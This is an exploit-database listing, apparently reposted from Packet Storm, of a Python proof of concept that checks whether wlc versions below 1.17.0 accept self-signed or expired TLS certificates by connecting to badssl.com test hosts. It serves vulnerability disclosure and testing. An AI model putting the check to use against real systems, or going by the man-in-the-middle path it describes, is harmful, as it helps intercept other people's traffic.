Vulners
Lucene search
đ wlc SSL Certification Validation Bypass
đď¸Â 20 Feb 2026 00:00:00Reported by indoushkaType 
 packetstormđ packetstorm.newsđ 85 Views
=============================================================================================================================================
| # Title : SSL Certificate Validation Bypass in wlc Versions Below 1.17.0 |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://ubuntu.com/security/notices/USN-7981-1 |
=============================================================================================================================================
[+] Summary : This Proof of Concept (PoC) demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed.
By attempting connections to endpoints with invalid certificates (such as selfâsigned or expired certificates), the PoC verifies whether wlc accepts the connection without proper SSL verification.
Successful execution indicates that a ManâinâtheâMiddle (MITM) attacker could intercept or manipulate communications. The PoC is intended strictly for educational and controlled testing environments.
[+] POC : python poc.py
#!/usr/bin/env python3
import subprocess
import sys
import shutil
def test_ssl_bypass(url):
print(f"[*] Testing URL: {url}")
if not shutil.which("wlc"):
print("[!] The 'wlc' tool was not found in the system path.")
return False
try:
cmd = ["wlc", "--weblate-url", url, "list-projects"]
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=10
)
print(f"[*] Standard Output (STDOUT): {result.stdout[:100]}...")
print(f"[*] Standard Error (STDERR): {result.stderr[:100]}...")
print(f"[*] Exit Code: {result.returncode}")
return result.returncode == 0
except subprocess.TimeoutExpired:
print("[!] Connection timed out.")
return False
except FileNotFoundError:
print("[!] Failed to execute 'wlc' (not found or not executable).")
return False
except Exception as e:
print(f"[!] Error: {e}")
return False
if __name__ == "__main__":
test_urls = [
"https://self-signed.badssl.com/",
"https://expired.badssl.com/",
]
print("[*] Testing for SSL Bypass vulnerability in wlc")
print("[*] Target version: < 1.17.0")
for url in test_urls:
if test_ssl_bypass(url):
print(f"[OK] SSL verification bypassed for: {url}")
print("[!] Vulnerability confirmed: An MITM attacker could intercept the connection.")
break
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7